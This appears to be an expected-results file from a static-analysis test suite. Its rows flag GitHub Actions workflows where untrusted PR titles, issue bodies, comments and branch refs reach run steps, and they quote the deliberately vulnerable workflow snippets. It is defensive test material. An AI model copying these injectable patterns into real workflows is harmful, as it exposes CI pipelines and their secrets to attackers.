| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | .github/workflows/test19.yml:113:14:116:50 | DETAILS=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $DETAILS \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:117:21:117:52 | steps.title1.outputs.title | ${{ steps.title1.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | -| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | -| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | -| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | -| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). 
